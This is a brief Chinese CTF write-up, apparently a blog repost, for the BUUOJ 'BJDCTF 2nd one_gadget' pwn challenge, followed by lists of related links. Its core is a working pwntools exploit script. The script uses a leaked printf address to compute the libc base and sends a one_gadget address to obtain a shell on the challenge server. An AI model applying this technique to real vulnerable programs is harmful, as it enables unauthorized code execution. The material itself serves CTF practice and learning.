buuoj BJDCTF 2nd one_gadget

其他 2020-03-26 02:45:31 阅读次数: 0

程序输出printf函数地址

可以利用工具one_gadget计算libc基址

from pwn import *

#p = process('./one_gadget')
p = remote("node3.buuoj.cn",26742)

out = p.recv()

addr = int(out[out.find('0x')+2:out.find('0x')+14],16)

log.success(addr)

local_libc = ELF('./libc-2.29.so')

printf_addr = local_libc.symbols['printf']

libc_base = addr - printf_addr

log.success(libc_base)

one_gadget = 0x106ef8

p.sendline(str(one_gadget+libc_base))

p.interactive()

pond99

发布了4 篇原创文章 · 获赞 0 · 访问量 122

私信关注

猜你喜欢

转载自blog.csdn.net/pondzhang/article/details/105108161

buuoj BJDCTF 2nd one_gadget

[BJDCTF 2nd]one_gadget

CTF-Pwn-[BJDCTF 2nd]one_gadget

BUUOJ [BJDCTF 2nd]elementmaster

CTF-Pwn-[BJDCTF 2nd]one_gadget的wp

[BUUOJ记录] [BJDCTF 2nd]fake google

BJDCTF on buuoj

[BJDCTF 2nd]duangShell [BJDCTF 2nd]duangShell

[BJDCTF 2nd]elementmaster

BJDCTF 2nd WEB

BJDCTF 2nd writeup

[BJDCTF 2nd]duangShell

[BJDCTF 2nd]文件探测

[BJDCTF 2nd]fake google

[BJDCTF 2nd]old-hack

BJDCTF 2nd pwn Writeup

BJDCTF 2nd writeup(二)

[BJDCTF 2nd]Schrödinger

BJDCTF 2nd(WEB复现)

BUUCTF：[BJDCTF 2nd]EasyBaBa

[BJDCTF 2nd]简单注入

[BJDCTF 2nd] old-hack

[BJDCTF 2nd]r2t3

CTF-Pwn-[BJDCTF 2nd]ydsneedgirlfriend2

buuctf [BJDCTF 2nd]ydsneedgirlfriend2

[BJDCTF 2nd]ydsneedgirlfriend2的wp

[BJDCTF 2nd]r2t4的wp

[BJDCTF 2nd]duangShell（反弹shell，swp泄露）

CTF-Pwn-[BJDCTF 2nd]els

CTF-Pwn-[BJDCTF 2nd]diff

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)